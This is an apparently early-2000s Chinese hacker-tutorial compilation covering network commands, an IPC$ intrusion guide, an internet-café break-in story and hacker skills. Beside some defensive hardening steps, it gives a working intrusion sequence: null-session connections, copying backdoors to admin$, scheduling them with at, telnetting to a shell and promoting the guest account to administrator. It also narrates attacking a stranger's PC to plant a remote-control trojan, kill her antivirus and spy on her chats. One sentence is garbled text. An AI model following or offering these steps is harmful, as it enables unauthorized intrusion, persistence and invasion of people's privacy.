BlackICE插件:这个插件可以完善BlackICE的结果列表,让列表更加詳盡,同时该插件还提供了更好的结果分类查詢功能,并且可以对结果进行复制、编輯等操作。另外此插件为BlackICE提供了聲音,可以設置软体使用过程中的提醒、警告的音效。
Isecure IP Scanner
netbios共用扫描器:骇客利用netbios的共用可以进入存在問題的电脑并对硬碟进行操作,同时还可以获得入侵电脑上的隱私资料。这个扫描器就是專门为防止此类事件发生开发的,运行软体会自动扫描目标并報告有关资料。
AnalogX Port Blocker
埠遮罩程式:当使用者的电脑上开放某个埠的时候,任何人都可以通过其开放埠访問相应资源,而AnalogX PortBlocker可以遮罩某个埠,或者設置特殊IP位址禁止对指定埠的请求,这从一定程度上方便了程式調试人员为在本地系统上从事软体的測试工作。
Tambu Dummy Server
埠遮罩程式:这个工具同上面一个程式的功能是一样的,不过不同的是,这个工具是基于控制台模式,更加适合于高手。
Tambu Registry Edit
註冊表修改程式:该程式可以让使用者手动修改系统註冊表中的各项鍵值,从而改变系统的性能,同时软体中保存了网路上常見的具有破坏性程式的资料,可以迅速確定系统註冊表中是否有可疑程式,并提供了清除和備份等功能。
==================================================
骇客必学的六条系统命令
这里我補充下,見笑了,呵呵,想学入侵,一定要知道cmd下的命令,如用ipc$入侵等,我发现有些人只知道骇客工具的使用,dos命令卻一个都不知,其实适当的熟悉一些命令也无妨!
如:刚装完系统,打开了默认共用,现在用dos命令建立一个批次处理刪除默认共用。如下:
先打开cmd視窗,輸入
copy con killshare.bat
net share c$ /del
net share d$ /del
net share e$ /del
net share admin$ /del
net share ipc$ /del (如果刪除了这个共用,则局域网无法互相访問,请注意!)
以下是原文:-----------------------------------------------------------
一、ping命令
在Windows的控制視窗中(Windows 95/98/ME的command解释器、Windows NT/2000的cmd解释器),运行ping可以看到这个命令的说明,它是一个探測本地电脑和远端电脑之间资讯传送速度的命令,这个命令需要TCP/IP协定的支援,ping将会計算一条资讯从本地发送到远端再返回所需要的时间,骇客使用这个命令决定是否对伺服器进行攻击,因为連接速度过慢会浪費时间、花費过多的上网費用。
另外这个命令还可以透过功能变数名稱找到对方伺服器的IP位址,我们知道功能变数名稱只是提供给流览网页用的,当我们看到一个不错的功能变数名稱位址后,要想通过telnet連接它,就必须知道对方的IP位址,这里也要使用ping命令的。
这个命令的基本使用格式可以通过直接运行ping获得,现在假設目标是http://www.abc.com/,则可以在控制台下輸入ping www.abc.com,经过等待会得到如下资讯:
Pinging www.abc.com[204.202.136.32] with 32 bytes of data:
Reply from 204.202.136.32:bytes=32 time=302ms TTL=240
Reply from 204.202.136.32:bytes=32 time=357ms TTL=240
Reply from 204.202.136.32:bytes=32 time=288ms TTL=240
Reply from 204.202.136.32:bytes=32 time=274ms TTL=240
Ping statistics for204.202.136.32:
Packets: Sent = 4, Received= 4, Lost = 0 (0% loss),
Approximate round triptimes in milli-seconds:
Minimum = 274ms, Maximum =357ms, Average = 305ms
注意它的返回值来判断对方OS
这些资讯的意思是:www.abc.com的IP位址是204.202.136.32,对他发送了四次数據包,资料包的大小是32位元組,每一次返回的时间分别是302ms、357ms、288ms、274ms。綜合看,发送了四个资料包全部返回,最小时间是274ms,最大时间357ms,他们的平均时间是305ms。
这样骇客就了解了連接对方伺服器使用的时间。另外这个命令还有一些特殊的用法,例如可以通过IP位址反查伺服器的NetBIOS名,现在以211.100.8.87为例,使用ping配合“-a”,在控制台下輸入命令ping -a211.100.8.87,它的返回结果是:
Pinging POPNET-FBZ9JDFV[211.100.8.87] with 32 bytes of data:
Reply from 211.100.8.87:bytes=32 time=96ms TTL=120
Reply from 211.100.8.87:bytes=32 time=110ms TTL=120
Reply from 211.100.8.87:bytes=32 time=110ms TTL=120
Reply from 211.100.8.87:bytes=32 time=109ms TTL=120
Ping statistics for211.100.8.87:
Packets: Sent = 4, Received= 4, Lost = 0 (0% loss),
Approximate round triptimes in milli-seconds:
Minimum = 96ms, Maximum =110ms, Average = 106ms
从这个结果会知道伺服器的NetBIOS名稱是POPNET-FBZ9JDFV。另外在一般情況下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情況下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,例如上面的www.abc.com返回的TTL是240,对方的系统很可能是Linux,而第二个目标的TTL是120,那么说明它使用的系统也许是Windows。
另外ping还有很多靈活的应用,我不在这里过多的介绍,读者请另行查阅此命令相关帮助檔。
二、net命令:
NET命令是很多网路命令的集合,在WindowsME/NT/2000内,很多网路功能都是以net命令为开始的,通过net help可以看到这些命令的詳細介绍:
NET CONFIG 顯示系统网路設置
NET DIAG 运行MS的DIAGNOSTICS程式顯示网路的DIAGNOSTIC资讯
NET HELP 顯示帮助资讯
NET INIT 不通过綁定来載入协定或网卡驅动
NET LOGOFF 断开連接的共用资源
NET LOGON 在WORKGROUP中登陸
NET PASSWORD 改变系统登陸密码
NET PRINT 顯示或控制列印作業及列印佇列
NET START 啟动服務,或顯示已啟动服務的列表
NET STOP 停止网路服務
NET TIME 使电脑的时鐘與另一台电脑或域的时间同步
NET USE 連接电脑或断开电脑與共用资源的連接,或顯示电脑的連接资讯
NET VER 顯示局域网内正在使用的网路連接类型和资讯
NET VIEW 顯示域列表、电脑列表或指定电脑的共用资源列表
这些命令在Win95/98中支持的比较少,只有几个基本常見的,而在NT或者2000中又元元多于上面的介绍,不过大多数对于初学者也没有必要掌握,所以我选择了WindowsME进行介绍,其中最常用到的是NET VIEW和NET USE,通过者两个命令,学习者可以連接网路上开放了远端共用的系统,并且获得资料。这种远端共用本来是为便捷操作設計的,但是很多网路管理员忽視了它的安全性,所以造成了很多不应该共用的资讯的暴露,对于学习者来说,则可以輕易获得它人电脑上的隱私资料。
例如在控制台下輸入net view\\202.96.50.24则可以获得对应IP的系统共用目录,进而找到他们的共用檔,当然这需要202.96.50.24系统的確存在共用目录,具体如何找到这些存在共用的系统,我将会在后面的文章中进行介绍。
三、telnet和ftp命令:
这两个命令分别可以远端对系统进行telnet登陸和ftp登陸,两种登陸使用的不同的协定,分别屬于两种不同的网路服務,ftp是远端檔共用服務,也就是说学习者可以将自己的资料上传、下載,但是它并没有过多的权利,无法在远端电脑上执行上传的檔;而telnet则屬于远端登陸服務,也就是说可以登陸到远端系统上,并获得一个解释器许可权,擁有解释器就意味者擁有了一定的许可权,这种许可权可能是基本的檔操作、也可能是可以控制系统的管理员许可权。
==================================================
四、netstat命令:
这个程式有助于我们了解网路的整体使用情況。它可以顯示当前正在活动的网路連接的詳細资讯,如采用的协定类型、当前主机與远端相連主机(一个或多个)的IP位址以及它们之间的連接狀態等。 使用netstat ?可以顯示它的命令格式和參数说明:
netstat [-a] [-e] [-n] [-s][-p proto] [-r] [interval] 其中的參数说明如下:
-a 顯示所有主机的埠号;
-e 顯示乙太网统計资讯;
-n 以数位表格形式顯示位址和埠;
-p proto 顯示特定的协定的具体使用资讯;
-r 顯示本机路由表的内容;
-s 顯示每个协定的使用狀態(包括TCP、UDP、IP);
interval 重新顯示所选的狀態,每次顯示之间的间隔数(單位秒)。
netstat命令的主要用途是檢測本地系统开放的埠,这样做可以了解自己的系统开放了什么服務、还可以初步推断系统是否存在木马,因为常見的网路服務开放的默认埠輕易不会被木马佔用,例如:用于FTP(檔传輸协议)的埠是21;用于TELNET(远端登录协定)的埠是23;用于SMTP(郵件传輸协定)的埠是25;用于DNS(功能变数名稱服務,即功能变数名稱與IP之间的轉换)的埠是53;用于HTTP(超文本传輸协定)的埠是80;用于POP3(电子郵件的一种接收协定)的埠是110;WINDOWS中开放的埠是139,除此以外,如果系统中还有其他陌生的到口,就可能是木马程式使用的了。通过netstat或者netstat -a可以觀察开放的埠,如果发现下面的埠,就说明已经有木马程式在系统中存在:
31337号埠是BackOffice木马的默认埠;1999是Yai木马程式;2140或者3150都是DEEP THROAT木马使用的埠;还有NETBUS、冰河或者SUB7等木马程式都可以自定義埠,因此发现了陌生埠一定要提高警惕,使用防火墙或者查病毒软体进行檢測。
五、tracert命令:
这个命令的功能是判定资料包到达目的主机所经过的路徑、顯示资料包经过的中繼节点清單和到达时间。tracert命令的格式如下:
tracert [-d] [-hmaximum_hops] [-j host-list] [-w timeout] target_name
命令行中的參数-d是要求tracert不对主机名进行解析,-h是指定搜索到目的地址的最大輪数,-j的功能是沿者主机列表释放源路由,-w用来設置超时时间间隔。
通过tracert可以判断一个伺服器是屬于国内还是国际(网路服務器的物理未知不能依*功能变数名稱进行判断),根據路由路经可以判断资讯从自己的系统发送到网路上,先后经过了哪些IP到大对方伺服器,这就好像乘公共汽車的时候从起点出发到达终点站的时候,中途会出现很多路牌一个道理,我们清楚了自己的资讯的传送路徑,才能够更清晰的了解网路、对伺服器进行攻击。
六、winipcfg:
winipcfg和ipconfig都是用来顯示主机内IP协定的配置资讯。只是winipcfg适用于Windows 95/98,而ipconfig适用于Windows NT。winipcfg不使用參数,直接运行它,它就会采用Windows視窗的形式顯示具体资讯。这些资讯包括:网路适配器的物理位址、主机的IP位址、子网路遮罩以及默认閘道等,点击其中的“其他资讯”,还可以查看主机的相关资讯如:主机名、DNS伺服器、节点类型等。其中网路适配器的物理位址在檢測网路错误时非常有用。
ipconfig的命令格式如下:ipconfig [/? |/all | /release [adapter] | /renew [adapter]]
其中的參数说明如下:
使用不帶參数的ipconfig命令可以得到以下资讯:IP地址、子网路遮罩、默认閘道。而使用ipconfig
/? 顯示ipconfig的格式和參数的英文说明;
/all 顯示所有的配置资讯;
/release 为指定的适配器(或全部适配器)释放IP位址(只适用于DHCP);
/renew 为指定的适配器(或全部适配器)更新IP位址(只适用于DHCP)。
/all,则可以得到更多的资讯:主机名、DNS伺服器、节点类型、网路适配器的物理位址、主机的IP位址、子网路遮罩以及默认閘道等。
==================================================
ipc$入侵與防範
一 前言
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏優秀之作,攻击步驟甚至可以说已经成为经典的模式,因此也没人願意再把这已经成为定式的東西拿出来擺弄。
不过話雖这样说,但我个人认为这些文章講解的并不詳細,对于第一次接触ipc$的菜鸟来说,簡單的羅列步驟并不能解答他们的许多迷惑。
二 什么是ipc$
IPC$(Internet ProcessConnection)是共用"具名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的具名管道,可以通过验证用户名和密码获得相应的许可权,在远端管理电脑和查看电脑的共用资源时使用。
利用IPC$,連接者甚至可以與目标主机建立一个空的連接而无需用户名與密码(当然,对方机器必须开了ipc$共用,否则你是連接不上的),而利用这个空的連接,連接者还可以得到目标主机上的用户列表(不过負責的管理员会禁止導出用户列表的)。
我们總在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意義上的漏洞,它是为了方便管理员的远端管理而开放的远端网路登陸功能,而且还打开了默认共用,即所有的邏輯盤(c$,d$,e$......)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代詞一个)会利用IPC$,访問共用资源,導出用户列表,并使用一些字典工具,进行密码探測,寄希望于获得更高的许可权,从而达到不可告人的目的。
解惑:
1)IPC連接是Windows NT及以上系统中特有的远端网路登陸功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友说在98下能建立空的連接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空連接也不是100%都能建立成功,如果对方关閉了ipc$共用,你仍然无法建立連接
3)并不是说建立了ipc$連接就可以查看对方的用户列表,因为管理员可以禁止導出用户列表
三 建立ipc$連接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的連接,你也可以获得不少的资讯(而这些资讯往往是入侵中必不可少的),访問部分共用,如果你能够以某一个具有一定许可权的用户身份登陸的話,那么你就会得到相应的许可权,顯然,如果你以管理员身份登陸,嘿嘿,就不用我在多说了吧,what u want,ucan do!!
(基本上可以總结为获取目标资讯、管理目标进程和服務,上传木马并运行,如果是2000server,还可以考慮开啟终端服務方便控制.怎么样?够厲害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,雖然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,隨者人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的
因此今后你最大的可能就是以极小的许可权甚至是没有许可权进行連接,你会慢慢的发现ipc$連接并不是萬能的,甚至在主机不开啟ipc$共用时,你根本就无法連接。
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它戰无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但卻是不可缺少的,我覺得这才是ipc$連接在hack入侵中的意義所在。
四 ipc$與空連接,139,445埠,默认共用的关係
以上四者的关係可能是菜鸟很困惑的一个問題,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透徹,都是在與大家交流中總结出来的.(一个有良好討论氛圍的BBS可以说是菜鸟的天堂)
1)ipc$與空連接:
不需要用户名與密码的ipc$連接即为空連接,一旦你以某个用户或管理员的身份登陸(即以特定的用户名和密码进行ipc$連接),自然就不能叫做空連接了。
许多人可能要問了,既然可以空連接,那我以后就空連接好了,为什么还要費九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空連接登陸时,你没有任何许可权(很鬱悶吧),而你以用户或管理员的身份登陸时,你就会有相应的许可权(有许可权誰不想呀,所以还是老老实实扫吧,不要偷懶喲)。
2)ipc$與139,445埠:
ipc$連接可以实现远端登陸及对默认共用的访問;而139埠的开啟表示netbios协议的应用,我们可以通过139,445(win2000)埠实现对共用檔/印表机的访問,因此一般来講,ipc$連接是需要139或445埠来支援的。
3)ipc$與默认共用
默认共用是为了方便管理员远端管理而默认开啟的共用(你当然可以关閉它),即所有的邏輯盤(c$,d$,e$......)和系统目录winnt或windows(admin$),我们通过ipc$連接可以实现对这些默认共用的访問(前提是对方没有关閉这些默认共用)
五 ipc$連接失败的原因
以下5个原因是比较常見的:
1)你的系统不是NT或以上作業系统;
2)对方没有打开ipc$默认共用
3)对方未开啟139或445埠(惑被防火墙遮罩)
4)你的命令輸入有误(比如缺少了空格等)
5)用户名或密码错误(空連接当然无所谓了)
另外,你也可以根據返回的错误号分析原因:
错误号5,拒絕访問 : 很可能你使用的用户不是管理员许可权的,先提升许可权;
错误号51,Windows 无法找到网路路徑 : 网路有問題;
错误号53,找不到网路路徑 : ip位址错误;目标未开机;目标lanmanserver服務未啟动;
目标有防火墙(埠过濾);
错误号67,找不到网路名 : 你的lanmanworkstation服務未啟动;目标刪除了ipc$;
错误号1219,提供的憑據與已存在的憑據集衝突 : 你已经和对方建立了一个ipc$,请刪除再連。
错误号1326,未知的用户名或错误密码 : 原因很明顯了;
错误号1792,试圖登录,但是网路登录服務没有啟动 : 目标NetLogon服務未啟动。(連接域控会出现此情況)
错误号2242,此用户的密码已经过期 : 目标有帳号策略,強制定期要求更改密码。
关于ipc$連不上的問題比较复杂,除了以上的原因,还会有其他一些不確定因素,在此本人无法詳細而確定的说明,就*大家自己体会和试验了。
六如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依賴于ipc$的shell,比如sql的cmd擴展、telnet、木马,当然,这shell必须是admin许可权的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请確认相关服務都已运行,没有就啟动它(不知道怎么做的请看net命令的用法),还是不行的話(比如有防火墙,殺不了)建议放棄。
七如何防範ipc$入侵
1禁止空連接进行枚举(此操作并不能阻止空連接的建立,引自《解剖win2000下的空会話》)
首先运行regedit,找到如下組建
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous= DWORD的鍵值改为:00000001(如果設置为2的話,有一些問題会发生,比如一些WIN的服務出现問題等等)
2禁止默认共用
1)察看本地共用资源
运行-cmd-輸入net share
2)刪除共用(每次輸入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,......可以繼續刪除)
3)停止server服務
net stop server /y (重新啟动后server服務会重新开啟)
4)修改註冊表
运行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改为:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改为:00000000。
如果上面所说的主鍵不存在,就新建(右击-新建-雙位元組值)一个主健再改鍵值。
3永久关閉ipc$和默认共用依賴的服務:lanmanserver即server服務
控制面板-管理工具-服務-找到server服務(右击)-屬性-常規-啟动类型-已禁用
4安装防火墙(选中相关設置),或者埠过濾(濾掉139,445等),或者用新版本的優化大師
5設置复杂密码,防止通过ipc$窮举密码
八 相关命令
1)建立空連接:
net use \\IP\ipc$"" /user:""(一定要注意:这一行命令中包含了3个空格)
2)建立非空連接:
net use \\IP\ipc$ "用户名"/user:"密码" (同样有3个空格)
3)映射默认共用:
net use z: \\IP\c$ "密码"/user:"用户名" (即可将对方的c盤映射为自己的z盤,其他盤类推)
如果已经和目标建立了ipc$,则可以直接用IP+盤符+$访問,具体命令 net use z: \\IP\c$
4)刪除一个ipc$連接
net use \\IP\ipc$ /del
5)刪除共用映射
net use c: /del 刪除映射的c盤,其他盤类推
net use * /del 刪除全部,会有提示要求按y確认
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感謝原創作者!(不知道是哪位前輩)
1. C:\>net use\\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运氣好到家了),如果是打算攻击的話,就可以用这样的命令来與127.0.0.1建立一个連接,因为密码为"空",所以第一个引号处就不用輸入,后面一个雙引号里的是用户名,輸入administrators,命令即可成功完成。
2. C:\>copy srv.exe\\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盤與D盤,这看你要复制到什么地方去了)。
3. C:\>net time\\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.111:05 srv.exe
用at命令啟动srv.exe吧(这里設置的时间要比主机时间快,不然你怎么啟动啊,呵呵!)
5. C:\>net time\\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19上午 11:05,那就準備开始下面的命令。
6. C:\>telnet 127.0.0.199
这里会用到Telnet命令吧,注意埠是99。Telnet默认的是23埠,但是我们使用的是SRV在对方电脑中为我们建立一个99埠的Shell。
雖然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再啟动!所以我们打算建立一个Telnet服務!这就要用到ntlm了
7.C:\>copy ntlm.exe\\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8.C:\WINNT\system32>ntlm
輸入ntlm啟动(这里的C:\WINNT\system32>指的是对方电脑,运行ntlm其实是让这个程式在对方电脑上运行)。当出现"DONE"的时候,就说明已经啟动正常。然后使用"net starttelnet"来开啟Telnet服務!
9. Telnet 127.0.0.1,接者輸入用户名與密码就进入对方了,操作就像在DOS上操作一样簡單!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防萬一,我们再把guest啟动加到管理組
10. C:\>net user guest/active:yes
将对方的Guest用户啟动
11. C:\>net user guest1234
将Guest的密码改为1234,或者你要設定的密码
12. C:\>net localgroupadministrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帳号没改变的話,下次我们可以用guest再次访問这台电脑)
十 總结:
关于ipc入侵就说这么多了,覺得已经够詳細了,如果有不準確的地方,希望能與大家討论。
================================================================
网吧入侵全攻略
好久都没来网吧了.今天一朋友来找我.外面有下者雪.实在没地方玩.又给溜进了网吧...
在以前家里没買电脑时.整天都泡这网吧..所以对他的系统設置什么还了解点.都大半年没来了...不知道有啥变化..
这网吧还不错.别的网吧都是无盤的或者就是98的.这里98和2000都有..呵...搞入侵可方便了....
无意的看到13号坐者两MM...嘻....入侵也由此开始了.看能不能拿到MM的QQ号.....偶也找了一2000系统的机器做下..(偶找了一角落.呵.这样比较安全点..)
打开偶可爱的CMD..先net name下看看本机情況
WANGLU05
USER2000
命令成功完成。
我本机名是WANGLU05.ping下看看IP有无什么規则
Pinging wanglu05[192.168.0.13] with 32 bytes of data:
Reply from 192.168.0.13:bytes=32 timenet use //192.168.0.225/ipc$ "" /user:"user04"
命令成功完成。
网吧系统盤为G盤.接者映射对方G盤为我本地Z盤.
G:/>net use z://192.168.0.225/g$
命令成功完成。
现在我的电脑里多了一个Z盤...圖3.
现在我们在这个Z盤里新建或刪除檔.也就等于在192.168.0.225这个机器上操作了...
这些相信大家都知道的吧..我就不廢話了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........表说我坏....
下面来copy一个木马用户端上去先...由于只是看QQ而已...所以我找了一个
web控制台.体积没多大,205KB..下面是关于webserver的介绍./../
web控制台 (本站不提供此类工具下載)
一个直接在IE欄里輸入对方IP就可以控制对方机器的小软体,也就是所谓的B/S模式的控制。用起来很方便,对方运行了服務端后,你在IE欄里直接輸入对方IP就可以控制了,也可以通过刷新来实现重复抓屏。
接者
G:/>copy webserver.exe//192.168.0.225/admin$
已复制 1 个檔。
G:/>net time//192.168.0.225
//192.168.0.225 的当前时间是 2005/2/5 下午 05:00
命令成功完成
G:/>at //192.168.0.22517:02 webserver.exe
用AT命令啟动webserver.exe.
2分鐘过后.在IE里輸入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分鐘了.还是打不开....后来又重新来了一次.眼睛就盯者MM的螢幕看,才发现到了我指定的时间.程式执行时.被瑞星给殺了...
FT....我说那.
难道就没辦法了嗎...当然不是...可以换个别的马或加殼.修改它特徵码什么的.但在网吧工具也不是很齊全.我也懶的下..
还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软体了...
打开控制面板--管理工具--电脑管理
操作-連接到另一电脑.
然后輸入IP192.168.0.225
呵.等一会就可以看到成功了...你看到了什么?
更爽的是我们可以远端开啟他的服務...在这里啟动他的telnet服務.
OK了...
本地打开一cmd
輸入
G:/>telnet 192.168.0.225
回車后出现
Server allows NTLMauthentication only
Server has closedconnection
需要NTML认证的...用小榕的那个ntml.exe就可以解决这一問題.
ntlm.exe在《流光》的Tools目录中有的...
没工具怎么辦呢..
我们在本地添加一和远端主机同样的用户名
輸入
net user user04 /add 添加user04密码为空的用户
net localgroupadministrators user04 /add 把user04加入管理员組
然后来到G:/Winnt/system32下找到CMD.exe
右击.創建快捷方式.然后在快捷方式 CMD右击..屬性.
在以其他用户身份运行前打勾...
然后运行
快捷方式 CMD
彈出窗口.在用户名处輸入user04密码为空
然后
telnet 192.168.0.225
回車..哈哈...拿到shell了....
接下来的事就好辦了...去黑基down了一个knlps 命令行下殺进程的東東
copy上去././然后telnet上去.在CMD下执行...殺掉了瑞星的进程
这下把瑞星给关了.还怕他提示有毒
接者执行webserver.exe
在IE里輸入
192.168.0.225
看到了.挖卡卡..开心...点那个查看螢幕..呵..MM正在聊天...
好了她的QQ号码也拿到手了..加了她去聊聊去....
一.骇客的分类和行为
以我的理解,“骇客”大体上应该分为“正”、“邪”两类,正派骇客依*自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派骇客则是通过各种骇客技能对系统进行攻击、入侵或者做其他一些有害于网路的事情,因为邪派骇客所从事的事情违背了《骇客守则》,所以他们真正的名字叫“骇客”(Cracker)而非“骇客”(Hacker),也就是我们平时经常听说的“骇客”(Cacker)和“紅客”(Hacker)。
无论那类骇客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是一样的。即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点和目的不一样而已。
很多人曾经飾遙骸白齪誑推絞倍甲鍪裁矗渴遣皇非常刺激?”也有人对骇客的理解是“天天做无聊且重复的事情”。实际上这些又是一个错误的认识,骇客平时需要用大量的时间学习,我不知道这个过程有没有终点,只知道“多多益善”。由于学习骇客完全出于个人爱好,所以无所谓“无聊”;重复是不可避免的,因为“熟能生巧”,只有经过不断的联系、实践,才可能自己体会出一些只可意会、不可言传的心得?
在学习之余,骇客应该将自己所掌握的知识应用到实际当中,无论是哪种骇客做出来的事情,根本目的无非是在实际中掌握自己所学习的内容。骇客的行为主要有以下几种:
一、学习技术
互联网上的新技术一旦出现,骇客就必须立刻学习,并用最短的时间掌握这项技术,这里所说的掌握并不是一般的了解,而是阅读有关的“协议”(rfc)、深入了解此技术的机理,否则一旦停止学习,那么依*他以前掌握的内容,并不能维持他的“骇客身份”超过一年。
初级骇客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基本内容,然而今天的互联网给读者帶来了很多的资讯,这就需要初级学习者进行选择:太深的内容可能会给学习帶来困难;太“花哨”的内容又对学习骇客没有用处。所以初学者不能贪多,应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。
二、伪装自己:
骇客的一举一动都会被伺服器记录下来,所以骇客必须伪装自己使得对方无法辨别其真实身份,这需要有熟练的技巧,用来伪装自己的IP位址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。
伪装是需要非常过硬的基本功才能实现的,这对于初学者来说成的上“大成境界”了,也就是说初学者不可能用短时间学会伪装,所以我并不鼓励初学者利用自己学习的知识对网路进行攻击,否则一旦自己的行迹败露,最终害的害是自己。
如果有朝一日你成为了真正的骇客,我也同样不赞成你对网路进行攻击,毕竟骇客的成长是一种学习,而不是一种犯罪。
三、发现漏洞:
漏洞对骇客来说是最重要的资讯,骇客要经常学习别人发现的漏洞,并努力自己寻找未知漏洞,并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验,当然他们最终的目的是通过漏洞进行破坏或者修補上这个漏洞。
骇客对寻找漏洞的执者是常人难以想像的,他们的口号说“打破权威”,从一次又一次的骇客实践中,骇客也用自己的实际行动向世人印证了这一点——世界上没有“不存在漏洞”的程式。在骇客眼中,所谓的“天衣无缝”不过是“没有找到”而已。
四、利用漏洞:
对于正派骇客来说,漏洞要被修補;对于邪派骇客来说,漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”,骇客利用漏洞可以做下面的事情:
1、获得系统资讯:有些漏洞可以洩漏系统资讯,暴露敏感资料,从而进一步入侵系统;
2、入侵系统:通过漏洞进入系统内部,或取得伺服器上的内部资料、或完全掌管伺服器;
3、寻找下一个目标:一个胜利意味者下一个目标的出现,骇客应该充分利用自己已经掌管的伺服器作为工具,寻找并入侵下一个系统;
4、做一些好事:正派骇客在完成上面的工作后,就会修复漏洞或者通知系统管理员,做出一些维护网路安全的事情;
5、做一些坏事:邪派骇客在完成上面的工作后,会判断伺服器是否还有利用价值。如果有利用价值,他们会在伺服器上植入木马或者后门,便于下一次来访;而对没有利用价值的伺服器他们决不留情,系统崩溃会让他们感到无限的快感!
==================================================
二.骇客应掌握的基本技能
从这一节开始,我们就真正踏上学习骇客的道路了,首先要介绍的是作为一名初级骇客所必须掌握的基本技能,学习这可以通过这一节的阅读了解到骇客并不神秘,而且学习起来很容易上手。为了保证初学者对骇客的兴趣,所以本书采取了回圈式进度,也就是说每一章节的内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内容。
一、了解一定量的英文:
学习英文对于骇客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关骇客的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在这段时间内网路管理员就已经有足够的时间修補漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。因此学习骇客从一开始就要尽量阅读英文资料、使用英文软体、并且及时关注国外者名的网路安全网站。
二、学会基本软体的使用:
这里所说的基本软体是指两个内容:一个是我们日常使用的各种电脑常用命令,例如ftp、ping、net等;另一方面还要学会有关骇客工具的使用,这主要包括埠扫描器、漏洞扫描器、资讯截获工具和密码破解工具等。因为这些软体品种多,功能各不相同,所以本书在后面将会介绍几款流行的软体使用方法,学习者在掌握其基本原理以后,既可以选择适合自己的,也可以在“第二部分”中找到有关软体的开发指南,编写自己的骇客工具。
三、初步了解网路协定和工作原理:
所谓“初步了解”就是“按照自己的理解方式”弄明白网路的工作原理,因为协议涉及的知识多且复杂,所以如果在一开始就进行深入研究,势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议,尤其是流览网页的时候网路是如何传递资讯、用户端流览器如何申请“握手资讯”、伺服器端如何“应答握手资讯”并“接受请求”等内容,此部分内容将会在后面的章节中进行具体介绍。
四、熟悉几种流行的编程语言和脚本:
同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程式执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言,另外对于htm超文本语言和php、java等做基本了解,主要学习这些语言中的“变数”和“阵列”部分,因为语言之间存在内在联系,所以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习C语言和htm超文本语言。
五、熟悉网路应用程式:
网路应用程式包括各种伺服器软体后台程式,例如:wuftp、Apache等伺服器后台;还有网上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成伺服器,然后安装并运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚网路工作原理,这比依*理论学习要容易许多,能够达到事半功倍的效果!
==================================================
网路安全术语解释
一、协议:
